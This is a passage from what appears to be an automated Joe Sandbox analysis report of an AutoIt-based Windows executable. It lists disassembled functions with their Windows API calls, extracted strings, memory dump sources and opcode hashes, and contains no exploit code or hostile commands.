                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-383632319
                                                    • Opcode ID: da2ee399d677a24c2d653990e409343541dc8a10e2f7fc7e2475411583984c0b
                                                    • Instruction ID: efb93c02bb9de4cdd675dfbd288dd316649e24b8c25f2e8b9e29d4a2086eab79
                                                    • Opcode Fuzzy Hash: da2ee399d677a24c2d653990e409343541dc8a10e2f7fc7e2475411583984c0b
                                                    • Instruction Fuzzy Hash: A5917E70604701DBCB44EF20C451A6EB7E3AF95350F14886DF8965B3A2CB35ED4ACBA5
                                                    Function 006DB7FE Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006DB8B4
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,006D6B11,?), ref: 006DB910
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006DB949
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006DB98C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006DB9C3
                                                    • FreeLibrary.KERNEL32(?), ref: 006DB9CF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006DB9DF
                                                    • DestroyIcon.USER32(?), ref: 006DB9EE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006DBA0B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006DBA17
                                                      • Part of subcall function 00672EFD: __wcsicmp_l.LIBCMT ref: 00672F86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl$@U=u
                                                    • API String ID: 1212759294-1639919054
                                                    • Opcode ID: bad2c47dba8fe2b400dbfac38ae8294f05a6b3e29ff9ca112247dc8f6f3f8129
                                                    • Instruction ID: 9a29d747c9cfdc985b4b4a04ab847fdae42156ef1ffe65606d05a7243032cca2
                                                    • Opcode Fuzzy Hash: bad2c47dba8fe2b400dbfac38ae8294f05a6b3e29ff9ca112247dc8f6f3f8129
                                                    • Instruction Fuzzy Hash: 1961E071900205FAEB14DF64DC41FFE7BAAFB09720F10851AF915DA2C1DB749A81DBA0
                                                    Function 006DC1AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 229windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006DC1FC
                                                    • GetFocus.USER32 ref: 006DC20C
                                                    • GetDlgCtrlID.USER32(00000000), ref: 006DC217
                                                    • _memset.LIBCMT ref: 006DC342
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006DC36D
                                                    • GetMenuItemCount.USER32(?), ref: 006DC38D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 006DC3A0
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006DC3D4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006DC41C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006DC454
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006DC489
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0$hW
                                                    • API String ID: 1296962147-580508736
                                                    • Opcode ID: 9880cb6300dc791296adee650a1fbc8a916680f436c210d59c80a60f36a81a50
                                                    • Instruction ID: 5bee6b2a3419005999dbf64fe69e760f9b083a171e90f2e5ff2a8707f230a820
                                                    • Opcode Fuzzy Hash: 9880cb6300dc791296adee650a1fbc8a916680f436c210d59c80a60f36a81a50
                                                    • Instruction Fuzzy Hash: 3D817D70A093069FD714CF14C894AABBBEAFF88724F00492EF99597391D730D905CB92
                                                    Function 0065201B Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00651B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00652036,?,00000000,?,?,?,?,006516CB,00000000,?), ref: 00651B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006520D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0065216E
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0068BCA6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BCD7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BCEE
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BD0A
                                                    • DeleteObject.GDI32(00000000), ref: 0068BD1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID: hW
                                                    • API String ID: 641708696-1300829777
                                                    • Opcode ID: 4e01ec67ca4e53035568c4688156f2b727b18c8ef43dcca17958babf7b97ce45
                                                    • Instruction ID: ec0b860ac294893fa82b4c40af92d2ae9cb3ea5349f1e40fe81b69ab6597cdc9
                                                    • Opcode Fuzzy Hash: 4e01ec67ca4e53035568c4688156f2b727b18c8ef43dcca17958babf7b97ce45
                                                    • Instruction Fuzzy Hash: 3A619E31501A01DFCB39AF18D968BAAB7F3FF81312F10952DE9424BAB0C774A895DB54
                                                    Function 006BA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • CharLowerBuffW.USER32(?,?), ref: 006BA3CB
                                                    • GetDriveTypeW.KERNEL32 ref: 006BA418
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA460
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA497
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA4C5
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: b859b1a37dd5583982ec8199e417f1d25055b53edf1f3ca515577fb5175441a1
                                                    • Instruction ID: 557a5639f4fc328d1524fffb5763d4fb258770b98316ffeb5cacc3c6ba58aaa0
                                                    • Opcode Fuzzy Hash: b859b1a37dd5583982ec8199e417f1d25055b53edf1f3ca515577fb5175441a1
                                                    • Instruction Fuzzy Hash: 39515FB1514305DFC780EF20C8918AAB7E6EF94719F00896DF89A572A1DB31ED09CB56
                                                    Function 006AF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0068E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 006AF8DF
                                                    • LoadStringW.USER32(00000000,?,0068E029,00000001), ref: 006AF8E8
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0068E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 006AF90A
                                                    • LoadStringW.USER32(00000000,?,0068E029,00000001), ref: 006AF90D
                                                    • __swprintf.LIBCMT ref: 006AF95D
                                                    • __swprintf.LIBCMT ref: 006AF96E
                                                    • _wprintf.LIBCMT ref: 006AFA17
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006AFA2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: 20b5098c413347365de18324115fa8611d0cfa6c813478c06222a6b0e7b6c0ed
                                                    • Instruction ID: 78958a804f3647732314eb266c5141a8e2fd74553b7cbdd916cd98a3dd540003
                                                    • Opcode Fuzzy Hash: 20b5098c413347365de18324115fa8611d0cfa6c813478c06222a6b0e7b6c0ed
                                                    • Instruction Fuzzy Hash: 7F414E7280021DAACF44FFE0DD96DEEB77AAF15301F100169B906760A2EA356F09CB65
                                                    Function 006521A5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • GetSysColor.USER32(0000000F), ref: 006521D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID: hW
                                                    • API String ID: 259745315-1300829777
                                                    • Opcode ID: a1dfb151501d28101c3f20c7b0757a08fbc418a25cfc329f79206f1694eb4553
                                                    • Instruction ID: a480d999eb890079c4e6f160aa38024e30fe5cc51386f835290f4bb6ee92db14
                                                    • Opcode Fuzzy Hash: a1dfb151501d28101c3f20c7b0757a08fbc418a25cfc329f79206f1694eb4553
                                                    • Instruction Fuzzy Hash: 5E41B035400141DEDB255F28EC98BF93B67EB07322F185366FE668A2E1C7318E46DB21
                                                    Function 006BD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 006BDA10
                                                    • _wcscat.LIBCMT ref: 006BDA28
                                                    • _wcscat.LIBCMT ref: 006BDA3A
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006BDA4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BDA63
                                                    • GetFileAttributesW.KERNEL32(?), ref: 006BDA7B
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 006BDA95
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BDAA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: b0db41b804a5d33b66ba3f38202c2c99d0b1819d0a2aec9dc7a74f2f9ec39329
                                                    • Instruction ID: 951882f83d987cc4cca417a3d0df2617d203e9cc446f892ba9d7b89637d604a7
                                                    • Opcode Fuzzy Hash: b0db41b804a5d33b66ba3f38202c2c99d0b1819d0a2aec9dc7a74f2f9ec39329
                                                    • Instruction Fuzzy Hash: 448192B15042419FCB64EF64C8449EAB7EAAF89350F18892EF889CB351E734D985CB52
                                                    Function 006D6F23 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006D6FA5
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006D6FA8
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006D6FCC
                                                    • _memset.LIBCMT ref: 006D6FDD
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006D6FEF
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006D7067
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID: hW
                                                    • API String ID: 830647256-1300829777
                                                    • Opcode ID: c45c508dd31caf2a4076f3ed1af0e40da66ba41d27199229e563cbcef554132f
                                                    • Instruction ID: 016ad49d75eb83a22929877c44ceac1739929a79447921223e596c80e97caa51
                                                    • Opcode Fuzzy Hash: c45c508dd31caf2a4076f3ed1af0e40da66ba41d27199229e563cbcef554132f
                                                    • Instruction Fuzzy Hash: 16618A71900208AFDB10DFA8CC81EEE77BAEB09710F14415AFA14AB3E1D775AD41DB94
                                                    Function 006C731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 006C738F
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006C739B
                                                    • CreateCompatibleDC.GDI32(?), ref: 006C73A7
                                                    • SelectObject.GDI32(00000000,?), ref: 006C73B4
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006C7408
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006C7444
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006C7468
                                                    • SelectObject.GDI32(00000006,?), ref: 006C7470
                                                    • DeleteObject.GDI32(?), ref: 006C7479
                                                    • DeleteDC.GDI32(00000006), ref: 006C7480
                                                    • ReleaseDC.USER32(00000000,?), ref: 006C748B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 87330bd85457050d8d001bd503310c9181f4b49413e7400704415d1d09c1db33
                                                    • Instruction ID: 8f4cd15a79a5c361ca25d48ab2bff4b167f1fc28c29fb8e2231bbd202b22560e
                                                    • Opcode Fuzzy Hash: 87330bd85457050d8d001bd503310c9181f4b49413e7400704415d1d09c1db33
                                                    • Instruction Fuzzy Hash: 89514771904349EFCB14CFA8CC85EAEBBBAEF48310F14842EF95A97210C731A9408B60
                                                    Function 006B4F75 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 006B4F7A
                                                      • Part of subcall function 0067049F: timeGetTime.WINMM(?,753DB400,00660E7B), ref: 006704A3
                                                    • Sleep.KERNEL32(0000000A), ref: 006B4FA6
                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 006B4FCA
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006B4FEC
                                                    • SetActiveWindow.USER32 ref: 006B500B
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006B5019
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 006B5038
                                                    • Sleep.KERNEL32(000000FA), ref: 006B5043
                                                    • IsWindow.USER32 ref: 006B504F
                                                    • EndDialog.USER32(00000000), ref: 006B5060
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: @U=u$BUTTON
                                                    • API String ID: 1194449130-2582809321
                                                    • Opcode ID: 7854d6841a37394ef2813e51d084e4c99e28de0285229bc21ea3cee9c8bf38ad
                                                    • Instruction ID: 80e604648332c01a54b9b3bfdd6da29000110938d18429240c6073fb4e18c8f3
                                                    • Opcode Fuzzy Hash: 7854d6841a37394ef2813e51d084e4c99e28de0285229bc21ea3cee9c8bf38ad
                                                    • Instruction Fuzzy Hash: 422192F0A06604AFE7105F24EC89BE63BABEB49745B04A029F103822F1DB758D908775
                                                    Function 00656A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00670957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00656B0C,?,00008000), ref: 00670973
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00656BAD
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00656CFA
                                                      • Part of subcall function 0065586D: _wcscpy.LIBCMT ref: 006558A5
                                                      • Part of subcall function 0067363D: _iswctype.LIBCMT ref: 00673645
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-1018226102
                                                    • Opcode ID: c304ae5882a69b8e1737e62e3c1463f251d2d1b7537333b24c9c73b66e849cfe
                                                    • Instruction ID: 923d06cf76e55249cf8e6181e85e0677ea13b0cfe4582911942e56dfa3f2c64d
                                                    • Opcode Fuzzy Hash: c304ae5882a69b8e1737e62e3c1463f251d2d1b7537333b24c9c73b66e849cfe
                                                    • Instruction Fuzzy Hash: 2302CD701083419FC764EF20C8919AFBBF6EF99314F504A1DF88A972A1DB31DA49CB56
                                                    Function 006B2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2D50
                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 006B2DDD
                                                    • GetMenuItemCount.USER32(00715890), ref: 006B2E66
                                                    • DeleteMenu.USER32(00715890,00000005,00000000,000000F5,?,?), ref: 006B2EF6
                                                    • DeleteMenu.USER32(00715890,00000004,00000000), ref: 006B2EFE
                                                    • DeleteMenu.USER32(00715890,00000006,00000000), ref: 006B2F06
                                                    • DeleteMenu.USER32(00715890,00000003,00000000), ref: 006B2F0E
                                                    • GetMenuItemCount.USER32(00715890), ref: 006B2F16
                                                    • SetMenuItemInfoW.USER32(00715890,00000004,00000000,00000030), ref: 006B2F4C
                                                    • GetCursorPos.USER32(?), ref: 006B2F56
                                                    • SetForegroundWindow.USER32(00000000), ref: 006B2F5F
                                                    • TrackPopupMenuEx.USER32(00715890,00000000,?,00000000,00000000,00000000), ref: 006B2F72
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006B2F7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 3993528054-0
                                                    • Opcode ID: 7de1892a21be7040382f04e36ccb695c4ef7fab19b916fbe0dbd52bc1b5677d3
                                                    • Instruction ID: ebeb183715afd8dd3c430e51fe734541f0a18ea019e3da943d9b2e4070fcedfa
                                                    • Opcode Fuzzy Hash: 7de1892a21be7040382f04e36ccb695c4ef7fab19b916fbe0dbd52bc1b5677d3
                                                    • Instruction Fuzzy Hash: 5D7106B0641207BAEB218F15DC65FEABFAAFF04314F14421AF615AA2E0C7719C91C754
                                                    Function 006C88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                    Download Yara Rule
                                                    APIs
